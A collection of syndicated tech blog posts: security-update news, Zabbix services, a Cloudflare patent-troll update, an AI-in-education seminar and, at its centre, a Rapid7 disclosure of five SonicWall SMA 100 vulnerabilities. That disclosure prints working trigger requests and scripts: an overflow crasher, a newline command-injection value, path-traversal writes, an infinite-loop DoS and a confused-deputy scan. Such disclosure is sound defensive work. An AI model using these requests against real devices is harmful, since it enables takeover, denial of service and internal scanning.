Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/881005/rss

Security updates have been issued by Debian (clamav, vim, and wordpress), Mageia (ghostscript, osgi-core, apache-commons-compress, python-django, squashfs-tools, and suricata), openSUSE (libsndfile, net-snmp, and systemd), Oracle (httpd:2.4, kernel, and kernel-container), SUSE (libsndfile, libvirt, net-snmp, and systemd), and Ubuntu (exiv2, linux, linux-aws, linux-aws-5.11, linux-azure, linux-azure-5.11, linux-gcp, linux-gcp-5.11, linux-hwe-5.11, linux-kvm, linux-oem-5.10, linux-oracle, linux-oracle-5.11, linux-raspi, linux-oem-5.13, and linux-oem-5.14).

Anaconda is getting a new suit (Fedora Community Blog)

Post Syndicated from original https://lwn.net/Articles/880973/rss

The GTK-based Anaconda installer has long been used to set up Fedora,
CentOS, and RHEL systems. This Fedora Community Blog entry describes
some significant changes
that will appear in a future version of
Anaconda:

We will rewrite the new UI as a web browser-based UI using existing
Cockpit technology. We are taking this approach because Cockpit is
a mature solution with great support for the backend (Anaconda
DBus). The Cockpit team is also providing us with great support and
they have significant knowledge which we could use. We thank them
for helping us a lot with the prototype and creating a foundation
for the future development.

Take advantage of Zabbix services online by Sergejs Sorokins / Zabbix Summit Online 2021

Post Syndicated from sersor original https://blog.zabbix.com/take-advantage-of-zabbix-services-online-by-sergejs-sorokins-zabbix-summit-online-2021/18716/

From turnkey deployments to upgrades and training courses – Zabbix offers a vast selection of services to help you get the most value out of your Zabbix environment. In this blog post, we will take a look at the new and existing Zabbix online services and learn how they can benefit both Zabbix veterans and newcomers to the monitoring world.

Zabbix in public clouds

Zabbix images are available for the most popular cloud service providers, including AWS, Azure, Google Cloud Platform, and many others. Let’s talk about what applications and services are available for those of you who choose to take this Zabbix deployment route.

  • Virtual Appliances of Zabbix server and Zabbix proxy
  • Technical support services can be obtained directly in the cloud platform
  • Some cloud platforms provide containers for Zabbix server, Zabbix proxy, and Zabbix agent components

What does it take to deploy Zabbix in a public cloud?

  • 2-5 minutes to deploy a fully functional Zabbix instance
  • Easy to scale up and scale down according to your requirements
  • Select a geographical region where you wish to deploy your Zabbix component
    • For example, you could deploy the Zabbix server in one region and deploy a set of proxies across multiple other regions
  • The prices are very affordable and flexible
    • Depending on the cloud provider, the price can go as low as $5 per month for the virtual appliance of the Zabbix server

Zabbix technical support services

Zabbix technical support services are among the most popular services with our customers. Zabbix offers five tiers of support.

Starting from the Silver tier, which covers the basic customer requirements such as answering customer tech support questions, to the Enterprise and Global tiers, which include not only technical support services but also remote assistance, performance tuning, training, on-site visits, and more. Each customer can pick a support tier depending on their requirements and budget.

The technical support service provides multiple obvious and not-so-obvious benefits:

  • Support on demand
  • You will receive the answers to your questions strictly within your SLA
  • Insurance against “storms”
    • Whenever a major outage or issue arises in your infrastructure, Zabbix support can assist you with fixing the problems and ensuring that your Zabbix instance is in a healthy state
  • A way to influence the Zabbix road-map
    • Commercial customers of Zabbix have the advantage of a direct line of communication with Zabbix regarding their feature requests or potential bug reports

Zabbix professional training

We can divide the Zabbix training into two types of courses – core courses and one-day courses. Both of these types of courses are unique in the knowledge that they aim to deliver.

Core courses

The core courses are multi-day courses that range from the Zabbix Certified User course to Zabbix Certified Expert.

  • The Zabbix Certified User course is aimed at Zabbix users who are not involved in configuring Zabbix but who still need to access the Zabbix Dashboards and read metrics on a regular or semi-regular basis
  • On the other hand, the Zabbix Certified Specialist course is aimed at Zabbix users that deal with managing and configuring Zabbix – configuring metric collection, problem thresholds, data processing, and more
  • The Zabbix Certified Professional course takes another step forward and is tailored for up-and-coming Zabbix power users. The course covers deploying and managing advanced Zabbix infrastructures with automation and custom data collection in place
  • Lastly, the Zabbix Certified Expert course is aimed at potential Zabbix architects. By participating in this course, users will learn about best practices for designing Zabbix infrastructures, the inner workings of Zabbix processes, and all of the underlying logic that Zabbix applies when processing data and generating alerts

One-day courses

The goal of the Zabbix one-day courses is to take an in-depth look at a particular topic and provide all of the available knowledge on specific Zabbix features. These are one-day courses with a large focus on practical tasks. The content of these courses is unique; therefore, it doesn’t matter whether you’re a newcomer or a seasoned Zabbix expert – the information covered in the courses will be useful to you in any scenario.

Course availability

All of the aforementioned courses are widely available all over the world. Zabbix provides courses in different languages and for different time zones, both online and on-site.

  • The courses are available in 11 languages
  • Currently, there are 8 types of courses with more to come down the line
  • 21 official training partners, providing Zabbix training in different languages and time zones
  • Available both online and on-site

What we covered here is just a small part of the overall service offering that Zabbix provides. In addition to the aforementioned services, you can visit the Zabbix Professional Services page to find a full list of Zabbix services – from consultancy hours to turnkey deployments and integration services. If you’re interested in any kind of assistance from Zabbix, feel free to get in touch with our Sales department – [email protected] and together we will tailor the best service offering for you.

Questions

Q: What pre-requisites are required for the attendees of Zabbix training courses?

A: For the Zabbix Certified User course there are no pre-requisites. As for the Zabbix Certified Specialist – some basic IT knowledge and at least surface-level ability to navigate the Linux operating system would be useful for the attendees. On the other hand, the Zabbix Certified Professional course requires the completion of the Zabbix Certified Specialist course. Similarly – the Zabbix Certified Expert course requires the completion of the Zabbix Certified Professional course.

 

Q: With the release of Zabbix 6.0 LTS right around the corner – should our users simply wait until Zabbix 6.0 LTS training is available, or can they certify in Zabbix 5.0 LTS?

A: Since Zabbix 5.0 LTS courses are still available, I would look at what you plan to stick with for the foreseeable future. If there are no plans to upgrade to Zabbix 6.0 LTS, then the Zabbix 5.0 LTS course could be the best for you. On the other hand, if a Zabbix upgrade is already scheduled – then 6.0 LTS might just benefit you more.

 

Q: What if I have the Zabbix 5.0 LTS specialist certificate – will I be able to attend the Zabbix 6.0 LTS professional course, or do I have to start over?

A: With the release of Zabbix 6.0 LTS we plan to introduce the Zabbix Certified Upgrade course. This will be a one-day course that will allow Zabbix 5.0 certified specialists and professionals to upgrade their certification to the Zabbix 6.0 certified specialist or professional.

The upgrade course has the extra benefit of preparing you for the Zabbix 6.0 LTS changes before you actually perform the jump to the Zabbix 6.0 LTS release. With the upgrade certificate in hand, you will be aware of all of the changes and new features that await you in the latest Zabbix LTS release.

 

The post Take advantage of Zabbix services online by Sergejs Sorokins / Zabbix Summit Online 2021 appeared first on Zabbix Blog.

CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/


Over the course of routine security research, Rapid7 researcher Jake Baines discovered and reported five vulnerabilities involving the SonicWall Secure Mobile Access (SMA) 100 series of devices, which includes the SMA 200, 210, 400, 410, and 500v. The most serious of these issues can lead to unauthenticated remote code execution (RCE) on affected devices. We reported these issues to SonicWall, which published software updates and released fixes to customers and channel partners on December 7, 2021. Rapid7 urges users of the SonicWall SMA 100 series to apply these updates as soon as possible. The table below summarizes the issues found.

| CVE ID | CWE ID | CVSS | Fix |
|---|---|---|---|
| CVE-2021-20038 | CWE-121: Stack-Based Buffer Overflow | 9.8 | SNWLID-2021-0026 |
| CVE-2021-20039 | CWE-78: Improper Neutralization of Special Elements used in an OS Command (“OS Command Injection”) | 7.2 | SNWLID-2021-0026 |
| CVE-2021-20040 | CWE-23: Relative Path Traversal | 6.5 | SNWLID-2021-0026 |
| CVE-2021-20041 | CWE-835: Loop With Unreachable Exit Condition (“Infinite Loop”) | 7.5 | SNWLID-2021-0026 |
| CVE-2021-20042 | CWE-441: Unintended Proxy or Intermediary (“Confused Deputy”) | 6.5 | SNWLID-2021-0026 |

The rest of this blog post goes into more detail about the issues. Vulnerability checks are available to InsightVM and Nexpose customers for all five of these vulnerabilities.

Product description

The SonicWall SMA 100 series is a popular edge network access control system, which is implemented as either a standalone hardware device, a virtual machine, or a hosted cloud instance. More about the SMA 100 series of products can be found here.

Testing was performed on the SMA 500v firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. CVE-2021-20038 and CVE-2021-20040 affect only devices running version 10.2.x, while the remaining issues affect both firmware versions. Note that the vendor has released updates, detailed in their KB article SNWLID-2021-0026, to address all of these issues.

Credit

These issues were discovered by Jake Baines, Lead Security Researcher at Rapid7. These issues are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

CVE-2021-20038: Stack-based buffer overflow in httpd

Affected version: 10.2.1.2-24sv

The web server on tcp/443 (/usr/src/EasyAccess/bin/httpd) is a slightly modified version of the Apache httpd server. One of the notable modifications is in the mod_cgi module (/lib/mod_cgi.so). Specifically, there appears to be a custom version of the cgi_build_command function that appends all the environment variables onto a single stack-based buffer using strcat.

There is no bounds checking on this environment string buildup, so if a malicious attacker were to generate an overly long QUERY_STRING, they could overflow the stack-based buffer. The buffer itself is declared at the top of the cgi_handler function as a 202-byte character array (although it’s followed by a lot of other stack variables, so the depth required to cause the overflow is a fair amount more).

Regardless, the following curl command demonstrates the crash when sent by a remote and unauthenticated attacker:

curl --insecure "https://10.0.0.7/?AAAA[1794 more A's here for a total of 1798 A's]"

The above will trigger the following crash and backtrace:

Screenshot: the resulting crash and backtrace.

Technically, the above crash is due to an invalid read, but you can see the stack has been successfully overwritten above. A functional exploit should be able to return to an attacker’s desired address. The system does have address space layout randomization (ASLR) enabled, but it has three things working against this protection:

  1. httpd’s base address is not randomized.
  2. When httpd crashes, it is automatically restarted by the server, giving the attacker the opportunity to guess library base addresses, if needed.
  3. The SMA 100 series are 32-bit systems, and ASLR entropy is low enough that guessing library addresses is a feasible approach to exploitation.

Because of these factors, a reliable exploit for this issue is plausible. It’s important to note that httpd is running as the “nobody” user, so attackers don’t get to go straight to root access, but it’s one step away, as the exploit payload can su to root using the password “password.”
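Because httpd is restarted automatically after each crash, the request can simply be replayed while guessing addresses. A minimal Python sketch of the same unauthenticated trigger follows; the target address and payload length mirror the curl example above and are lab assumptions, not values from a real deployment:

```python
# Rough sketch: trigger the CVE-2021-20038 crash from Python instead of curl.
# TARGET is an assumed lab address; 1798 bytes comfortably exceeds the 202-byte
# stack buffer (plus the other locals) in cgi_handler.
import requests
import urllib3

urllib3.disable_warnings()  # the lab appliance presents a self-signed certificate

TARGET = "https://10.0.0.7"
payload = "A" * 1798

try:
    requests.get(f"{TARGET}/?{payload}", verify=False, timeout=10)
except requests.exceptions.ConnectionError:
    # httpd died mid-response; the watchdog restarts it, so the request can be replayed
    print("connection dropped - httpd likely crashed")
```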

CVE-2021-20038 exploitation impact

This stack-based buffer overflow has a suggested CVSS score of 9.8 out of 10. By exploiting this issue, an attacker can gain complete control of the device or virtual machine that’s running the SMA 100 series appliance. This can allow attackers to install malware to intercept authentication material from authorized users, or reach back into the networks protected by these devices for further attack. Edge-based network control devices are especially attractive targets for attackers, so we expect continued interest in these kinds of devices by researchers and criminal attackers alike.

CVE-2021-20039: Command injection in cgi-bin

Affected versions: 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv

The web interface uses a handful of functions to scan user-provided strings for shell metacharacters in order to prevent command injection vulnerabilities. There are three functions that implement this functionality (all of which are defined in libSys.so): isSafeCommandArg, safeSystemCmdArg, and safeSystemCmdArg2.

These functions all scan for the usual metacharacters (&|$><;’ and so on), but they do not scan for the newline character (‘\n’). This is problematic because, when it appears in a string passed to system, a newline acts as a command terminator. There are a variety of vectors an attacker could use to bypass these checks and reach system, and one (but certainly not the only) example is /cgi-bin/viewcert, which we’ll describe in more detail here.

The web interface allows authenticated individuals to upload, view, or delete SSL certificates. When deleting a certificate, the user provides the name of the directory that the certificate is in. These names are auto-generated by the system in the format of newcert-1, newcert-2, newcert-3, etc. A normal request would define something like CERT=newcert-1. The CERT variable makes it to a system call as part of an rm -rf %s command. Therefore, an attacker can execute arbitrary commands by using the ‘\n’ logic in CERT. For example, the following would execute ping to 10.0.0.9:

CERT=nj\n ping 10.0.0.9 \n
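To make the bypass concrete, here is an illustrative Python sketch of the same class of bug. This is not the appliance’s actual code, and the certificate directory path is made up, but the pattern is the same: a metacharacter denylist that forgets ‘\n’ feeding a shell command.

```python
import subprocess

BLOCKED = set("&|$><;'`")  # common metacharacters are rejected, but not "\n"

def is_safe(arg: str) -> bool:
    return not any(c in BLOCKED for c in arg)

def delete_cert(cert_dir: str) -> None:
    if not is_safe(cert_dir):
        raise ValueError("rejected by filter")
    # shell=True behaves like a C system() call: a newline ends the rm command,
    # and whatever follows it runs as a second command.
    subprocess.run(f"rm -rf /tmp/certs/{cert_dir}", shell=True)  # hypothetical path

delete_cert("newcert-1")                  # intended use
delete_cert("nj\n ping -c1 10.0.0.9 \n")  # passes the filter, also runs ping
```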

To see that in a real request, we have to first log in:

curl -v --insecure -F username=admin -F password=labpass1 -F domain=LocalDomain -F portalname=VirtualOffice -F ajax=true https://10.0.0.6/cgi-bin/userLogin

The system will set a swap cookie. That’s your login token, which can be copied into the following request. The following request executes ping via viewcert:

curl -v --insecure --Cookie swap=WWR0MElDSXJuTjdRMElTa3lQTmRPcndnTm5xNWtqN0tQQUlLZjlKZTM1QT0= -H "User-Agent: SonicWALL Mobile Connect" -F buttontype=delete -F $'CERT=nj \nping 10.0.0.9 \n' https://10.0.0.6/cgi-bin/viewcert

It’s important to note that viewcert elevates privileges so that when the attacker hits system, they have root privileges.

CVE-2021-20039 exploitation impact

Note that this vulnerability is post-authentication and leverages the administrator account (only administrators can manipulate SSL certificates). An attacker would already need to know (or guess) a working username and password in order to elevate access from administrator to root-level privileges. In the ideal case, this is a non-trivial barrier to entry for attackers. That said, the SMA 100 series does ship with a default password for the administrator account, most organizations allow administrators to choose their own passwords, and we know that the number of users who stick with default or easily guessed passwords on any device is non-zero.

CVE-2021-20040: Upload path traversal in sonicfiles

Affected versions: 10.2.0.8-37sv and 10.2.1.2-34sv

The SMA 100 series allows users to interact with remote SMB shares through the HTTPS server. This functionality resides in the endpoint https://address/fileshare/sonicfiles/sonicfiles. Most of the functionality simply flows through the SMA series device and doesn’t actually leave anything on the device itself, with the notable exception of RacNumber=43. That is supposed to write a file to the /tmp directory, but it is vulnerable to path traversal attacks.

To be a bit more specific, RacNumber=43 takes two parameters:

  • swcctn: This value gets combined with /tmp/ + the current date to make a filename.
  • A JSON payload. The payload is parsed as JSON and written to the swcctn file.

There is no validation applied to swcctn, so an attacker can supply path traversal sequences and write files outside of /tmp. The example below writes the file "hello.html.time" to the web server’s root directory:

Screenshot: the request, with a traversal sequence in the swcctn parameter, writing hello.html to the web server’s root directory.

This results in:

Screenshot: the resulting hello.html file.
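For illustration, a request along these lines could be issued as in the sketch below. The endpoint, RacNumber value, and swcctn parameter come from the description above; the exact parameter encoding, traversal depth, and target path are assumptions and may differ on a real device.

```python
# Hedged sketch of the CVE-2021-20040 write primitive. Parameter names follow the
# description above; the traversal path and JSON body are placeholders only.
import json
import requests

requests.post(
    "https://10.0.0.6/fileshare/sonicfiles/sonicfiles",
    params={
        "RacNumber": "43",
        # attempt to escape /tmp and land in an assumed web-root directory
        "swcctn": "../usr/src/EasyAccess/www/htdocs/hello.html",
    },
    data=json.dumps({"note": "written with nobody privileges"}),
    cookies={"swap": "bG9s"},  # same throwaway cookie used in the other examples
    verify=False,
)
```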

CVE-2021-20040 exploitation impact

There are some real limitations to exploiting CVE-2021-20040:

  1. File writing is done with nobody privileges. That significantly limits where an attacker can write, although being able to write to the web server’s root feels like a win for the attacker.

  2. The attacker can’t overwrite any existing file due to the random digits attached to the filename.

Given these limitations, an attack scenario will likely involve tricking users into believing their custom-created content is a legitimate function of the SMA 100, for example, a password "reset" function that takes a password.

CVE-2021-20041: CPU exhaustion in sonicfiles

Affected versions: 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv

An unauthenticated, remote adversary can consume all of the device’s CPU by sending crafted HTTP requests to hxxps://address/fileshare/sonicfiles/sonicfiles, resulting in an infinite loop in the fileexplorer process. The infinite loop is due to the way fileexplorer parses command line options. When parsing an option that takes multiple parameters, fileexplorer incorrectly handles parameters that lack spaces or that use the = symbol with the parameter. For example, the following request results in the infinite loop:

curl --insecure -v --Cookie swap=bG9s "https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://10.0.0.1/lol/test&Arg2=-elol&User=test&Pass=test"

The above request will result in fileexplorer being invoked like so:

/usr/sbin/fileexplorer -g smb://10.0.0.9/lol/test -elol -u test:test

Parsing the "-elol" portion triggers the infinite loop. Each new request will spin up a new fileexplorer process. Technically speaking, on the SMA 500v, only two such requests will result in ~100% CPU usage indefinitely. Output from top:

Screenshot: top output showing fileexplorer processes consuming roughly 100% CPU.

CVE-2021-20041 exploitation impact

A number of additional requests are required to truly deny availability, as this is not a one-shot denial-of-service request. It should also be noted that this is a parameter injection issue (specifically, the -e parameter is injected), and if the injection in this form didn’t result in an infinite loop, the attacker would have been able to exfiltrate arbitrary files (which of course would be more useful to an attacker).

CVE-2021-20042: Confused deputy in sonicfiles

Affected versions: 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv

An unauthenticated, remote attacker can use SMA 100 series devices as an "unintended proxy or intermediary," also known as a confused deputy attack. In short, that means an outside attacker can use the SMA 100 series device to access systems reachable via the device’s internal-facing network interfaces. This is because the sonicfiles component does not appear to validate the requester’s authentication cookie until after the fileexplorer request is made on the attacker’s behalf. Furthermore, the security check that validates whether the endpoint fileexplorer is accessing is allowed has been commented out for RacNumber 25 (aka COPY_FROM). Note the "_is_url_allow" logic below:

Screenshot: the relevant sonicfiles code with the _is_url_allow check commented out.

This results in the following:

  • An attacker can bypass the SMA 100 series device’s firewall with SMB-based requests.
  • An attacker can make arbitrary read/write SMB requests to a third party the SMA 100 series device can reach. File creation, file deletion, and file renaming are all possible.
  • An attacker can make TCP connection requests to arbitrary IP:port on a third party, allowing the remote attacker to map out available IP/ports on the protected network.

Just as a purely theoretical example, the following request sends a SYN to 8.8.8.8:80:

curl --insecure -v --Cookie swap=bG9s "https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://8.8.8.8:80/test&Arg2=test&User=test&Pass=test"

CVE-2021-20042 exploitation impact

There are two significant limitations to this attack:

  • The attacker does have to honor the third-party SMB server’s authentication. So to read/write, they’ll need credentials (or anonymous/guest access).
  • An unauthenticated attacker will not see responses, so the attack will be blind. Determining the result of an attack/scan will rely on timing and server error codes.

Given these constraints, an attacker does not command complete control of resources on the protected side of the network with this issue and is likely only able to map responsive services from the protected network (with the notable exception of being able to write to, but not read from, unprotected SMB shares).

Vendor statement

SonicWall routinely collaborates with third-party researchers, penetration testers, and forensic analysis firms to ensure that its products meet or exceed security best practices. One of these valued allies, Rapid7, recently identified a range of vulnerabilities to the SMA 100 series VPN product line, which SonicWall quickly verified. SonicWall designed, tested, and published patches to correct the issues and communicated these mitigations to customers and partners. At the time of publishing, there are no known exploitations of these vulnerabilities in the wild.

Remediation

As these devices are designed to be exposed to the internet, the only effective remediation for these issues is to apply the vendor-supplied updates.

Disclosure timeline

  • October, 2021: Issues discovered by Jake Baines of Rapid7
  • Mon, Oct 18, 2021: Initial disclosure to SonicWall via [email protected]
  • Mon, Oct 18, 2021: Acknowledgement from the vendor
  • Thu, Oct 28, 2021: Validation completed and status update provided by the vendor
  • Thu, Nov 9, 2021: Test build with updates provided by the vendor
  • Tue, Dec 7, 2021: SNWLID-2021-0026 released by the vendor to customers
  • Wed, Dec 7, 2021: Vulnerability checks available to InsightVM and Nexpose customers for all CVEs in this disclosure
  • Tue, Jan 11, 2022: This public disclosure
  • Tue, Jan 11, 2022: Module for CVE-2021-20039 PR#16041 provided to Metasploit Framework
  • Tue, Jan 11, 2022: Rapid7 analyses published for CVE-2021-20038 and CVE-2021-20039 in AttackerKB.


Former R&D Engineer Wins Round 2 of Project Jengo, and Cloudflare Wins at the Patent Office

Post Syndicated from Will Valle original https://blog.cloudflare.com/former-rd-engineer-wins-round-2-of-project-jengo-and-cloudflare-wins-at-the-patent-office/


The classic children’s fairy tale The Three Billy Goats Gruff tells the story of three goats trying to cross a bridge to a field of yummy grass, despite the monstrous troll that lives underneath the bridge and threatens to eat them. To beat the troll, the goats played on his greed and proceeded across the bridge in order from smallest to largest, holding the troll at bay each time with promises of a larger meal if he waited for the larger goat to follow. In the end, the troll passed on attacking the smaller goats and was left to do battle with the largest goat, who was able to defeat the troll, toss him off the bridge, and watch him float downstream. The goats were then able to enjoy the yummy grass, troll-free. In our fight against Sable Networks (a patent troll), we plan on being that third goat, and our recent wins suggest we might be on track to do just that.

$10,000 to our second round of Project Jengo winner!

We started Project Jengo 2 last year as a prior art search contest, so we could enlist your help in the battle against Sable Networks. We committed $100,000 in cash prizes to be shared by the winners who were successful in finding such prior art, and last quarter, we gave out $20,000 to three lucky winners. This quarter, we are excited to announce our second round winner who will take home $10,000! The winner submitted prior art related to the asserted ’431 patent.


“I do not master enough English to express how happy I am.”

We are happy to announce the winner for this round is Jean-Pierre Le Rouzic. Although Jean-Pierre is retired and living in Rennes, France, he decided to put his patent knowledge to work when he saw Project Jengo discussed on Hacker News. Jean-Pierre is a former telecommunications R&D engineer who wrote twelve patents in the 2000s that relate to online authentication and identity management. Impressively, he was one of the first users of Java at his company, and recalls using Java as early as 1996!

Jean-Pierre’s career experience certainly helped in his research – his Jengo submission was 24 pages and included a meticulously detailed claim chart. In particular, he addressed the weaknesses in Sable’s extremely broad reading of the ’431 “micro-flow management” patent. You can read more detailed information about Jean-Pierre’s findings in the appendix to this blog post, and all of the findings from Jean-Pierre and other submitters are available here to anyone who may face a challenge from Sable’s claims.

We enjoyed Jean-Pierre’s response to the good news:

I do not master enough English to express how happy I am, and how happy I am for Cloudflare if my work is useful. I find the idea of patent trolls hideous. The patent regulations should really be updated to enter the XXI century.

Jean-Pierre’s reasons for participating in Jengo were different from those of most other participants. His current interest is in neurodegenerative diseases, especially ALS, and he said part of his motivation stemmed from what he has seen in the medical industry:

The challenge faced by Cloudflare is close to my heart, because of its similarity to what is happening in the world of medical drugs. Cloudflare is facing an entity which is unreasonably stretching the meaning of their patent claims.

We could not agree more — we think Sable is beyond unreasonable, which is why we intend to change the incentive structure that makes things so easy for them, and we are so grateful for Jean-Pierre’s support (and all the other Jengo participants).

Also worth noting: we were excited to see that both he and one of his daughters are current users of Cloudflare!

My blog (padiracinnovation.org) uses Cloudflare, and I am a very satisfied user. The online shop of one of my daughter’s also uses Cloudflare.

Two patents at grave risk – U.S. Patent and Trademark Office rules that Cloudflare is likely to be successful invalidating two Sable patents in IPR proceeding!

Last year, we announced that we were facing a challenge from a patent troll called Sable Networks that was trying to weaponize decades-old and unused patents against us. With your help through the relaunch of Project Jengo, we became determined to outsmart the troll.

One of the steps we are taking, as Ethan mentioned in our August blog post, is seeking to invalidate the four asserted patents in the lawsuit through a procedure with the U.S. Patent and Trademark Office (Patent Office) known as inter partes review (IPR). As we previously explained, IPR is a trial proceeding that lasts for one year, conducted before the Patent Office, to determine whether or not a patent (or some of its constituent claims) should be invalidated. Importantly, the IPR process is only instituted after a party files an extensive petition that is reviewed by a panel of three administrative patent judges — who will only institute an IPR, if they believe a petitioner has a reasonable likelihood of succeeding in invalidating at least one claim from the challenged patent.

In December, after months of hard work and considerable attorney’s fees and expenses, we found out the efforts Ethan described last August had paid off — the first two of our four IPR petitions were granted by the Patent Office! For each of the challenged patents — the ’593 and the ’932 patents — an IPR proceeding has been instituted on every single claim — a total of 76 claims between the two patents. This is exceptional news for us, as the Patent Office has made a preliminary determination that we are likely to succeed on invalidating a vast majority of those claims, giving us a chance to invalidate those two patents in their entirety. This provides an independent path for defeating Sable’s lawsuit, because if the Patent Office declares a patent to be invalid — meaning that patent never should have been issued in the first place — the patent no longer exists, and we have effectively pushed the troll off the bridge. Now that we have two IPRs instituted, the Patent Office has one year from the date of institution to make their final decision on whether the challenged claims are valid or not.

And, by the way, it was pretty nice to see our diligence recognized:

“Moreover, the undisputed evidence here shows that [Cloudflare] acted diligently, filing its Petition only seven weeks after service of the complaint and well before preliminary infringement contentions were served.”

Decision Granting Institution of Inter Partes Review at p. 12 (IPR2021-00909) (Nov. 19, 2021)

Two more patents significantly trimmed back – Sable voluntarily abandons 34 of 38 claims in its other two patents before the Patent Office.

But this was only half the battle. There are four Sable patents at issue in the litigation. For the ’919 and ’431 patents, we filed separate IPR petitions on all 38 claims from those two patents last year. In response to our petitions, Sable voluntarily canceled 34 out of 38 claims from its own patents, which says a lot about what they think about the quality of their decades-old patents. The Patent Office subsequently declined to institute IPR on the four remaining claims. Sable is now left with only 4 out of the 38 claims to pursue in the litigation, and those four claims are far removed from Cloudflare’s products and services.

Bringing trolls out from under the bridge and into the light.

We are happy to see some more press coverage on the fight against Sable Networks. More press means that more people become aware of this issue and can help put a stop to future patent trolls. Most trolls merely send threatening letters and hope they can get a quick settlement from their threats without having to see the light of day by going to court or to the Patent Office to defend their claims. We are just one entity (that has enlisted your help) fighting against a villainous patent troll — but would it not be great to see other big companies fight back when they encounter their next troll?

  • “Cloudflare Lands Tribunal Review of Data Transmission Patent” — Bloomberg Law
  • “PTAB To Eye Patent Cloudflare Offered ‘Bounty’ To Help Kill” — Law 360
  • “Recently, Cloudflare Inc. succeeded in convincing the PTAB to institute in IPR2021-00969 against a Sable Network, Inc.’s patent directed toward data flow” — JD Supra

Please keep your submissions coming!

We could not have gotten to this point without the help of the many Project Jengo participants. We have received hundreds of prior art references on Sable’s ten patents, and we have used many of those references to help kill off the four patents that Sable asserted against us. While we have made some great progress together, we cannot let our guard down now. We will continue to fight vigorously, but just as in the Three Billy Goats Gruff, we need your support to take down a ravenous troll. Please consider submitting to our prior art contest, and please share the contest with co-workers, family and friends. On behalf of the Cloudflare community, thanks to everyone who has participated so far!


Appendix – Jean-Pierre’s findings (US-6954431 compared to US-7406098)

The ’431 patent leveraged by Sable is titled “Micro-Flow Management” and concerns Internet switching technology for network service providers. The patent claims priority all the way back to April 19, 2000. The ’431 patent discloses a router that puts a label on packets for a given “microflow,” and forwards all the packets in that same microflow based on the label.

Our first blog post about Sable’s claims explained that the ’431 patent assertions were so broad, they could stretch to possibly even the “conventional routers” from the 2000s that routed each packet independently.

Thankfully, Jean-Pierre noted some similarities between the asserted ’431 patent and the patent he tracked down. US Patent No. 7,406,098 was first publicly available as early as 1999. The ’098 patent is related to the allocation of communication resources of a single node among a multitude of subscribers. In Jean-Pierre’s words, both the asserted patent and the ’098 patent concern “the need to allocate switched packets resources to a single communication among many.”

The first claim in ’431 is for “a method for managing data traffic through a network”, while the first claim in the ’098 is for “a method of allocating a resource in a communication system” — both of which Jean-Pierre found to read quite similar. As he described, in both cases there is a need to “allocate Internet (switched packets) resources to a single communication among many, this allocation is based on a classification.” Ultimately, the ’098 patent is noteworthy in that it demonstrates the obviousness of what Sable claims the ’431 patent covers. People of skill in the art (like the Qualcomm inventors from the ’098 patent), long before the ’431 patent, knew how to manage the flow of data using queues.

Take a look at the snapshot from the claim chart Jean-Pierre submitted:

Screenshot: excerpt from Jean-Pierre’s claim chart comparing the ’431 and ’098 patents.

The language in Claim 1 of the ’431 patent deals with the “delegating” of “microflows”, while Claim 14 of the ’098 patent deals with the “assigning” of “application flows”. We have hardly scraped the surface here, as there are plenty of other similarities between the two patents — take a look for yourselves!

We are grateful for Jean-Pierre’s participation in Project Jengo, and we are looking forward to receiving more prior art as we continue to fight Sable Networks!

How can AI-based analysis help educators support students?

Post Syndicated from Henna Gorsia original https://www.raspberrypi.org/blog/ai-sytems-in-education-learner-support-research-seminar/

We are hosting a series of free research seminars about how to teach artificial intelligence (AI) and data science to young people, in partnership with The Alan Turing Institute.

In the fifth seminar of this series, we heard from Rose Luckin, Professor of Learner Centred Design at the University College London (UCL) Knowledge Lab. Rose is Founder of EDUCATE Ventures Research Ltd., a London consultancy service working with start-ups, researchers, and educators to develop evidence-based educational technology.

Rose Luckin.
Rose Luckin, UCL

Based on her experience at EDUCATE, Rose spoke about how AI-based analysis could help educators gain a deeper understanding of their students, and how educators could work with AI systems to provide better learning resources to their students. This provided us with a different angle to the first four seminars in our current series, where we’ve been thinking about how young people learn to understand AI systems.

Rose Luckin's definition of AI: technology capable of actions and behaviours "requiring intelligence when done by humans".
Rose’s definition of artificial intelligence for this presentation.

Education and AI systems

AI systems have the potential to impact education in a number of different ways, which Rose distilled into three areas: 

  1. Using AI in education to tackle some of the big educational challenges
  2. Educating teachers about AI so that they can use it safely and effectively 
  3. Changing education so that we focus on human intelligence and prepare people for an AI world

It is clear that the three areas are interconnected, meaning developments in one area will affect the others. Rose’s focus during the seminar was the second area: educating people about AI.

Rose Luckin's definition of the three intersections of education and artificial intelligence, see text in list above.

What can AI systems do in education? 

Through examples of existing AI-based systems used for education, Rose described what in particular makes AI systems useful in an education setting. The first point she raised was that AI systems can adapt based on learning from data. Her main example was the AI-based platform ENSKILLS, which detects the user’s level of competency with spoken English through the user’s interactions with a virtual character, and gradually adapts the character to the user’s level. Other examples of adaptive AI systems for education include Carnegie Learning and Century Intelligent Learning.

We know that AI systems can respond to different forms of data. Rose introduced the example of OyaLabs to demonstrate how AI systems can gather and process real-time sensory data. This is an app that parents can use in a young child’s room to monitor the child’s interactions with others. The app analyses the data it gathers and produces advice for parents on how they can support their child’s language development.

AI system creators can also combine adaptivity and real-time sensory data processing in their systems. One example Rose gave of this was SimSensei from the University of Southern California. This is a simulated coach, which a student can interact with and which gathers real-time data about how the student is speaking, including their tone, speed of speech, and facial expressions. The system adapts its coaching advice based on these interactions and on what it learns from interactions with other students.

Getting ready for AI systems in education

For the remainder of her presentation, Rose focused on the framework she is involved in developing as part of the EDUCATE service, which helps organisations, including the educators within them, prepare for implementing AI systems. The aim of this ETHICAI framework is to enable organisations and educators to understand:

  • What AI systems are capable of doing
  • The strengths and weaknesses of AI systems
  • How data is used by AI systems to learn
The EDUCATE consultancy service's seven-part AI readiness framework, see text below for list.

Rose described the seven steps of the framework as:

  1. Educate, enthuse, excite – about building an AI mindset within your community 
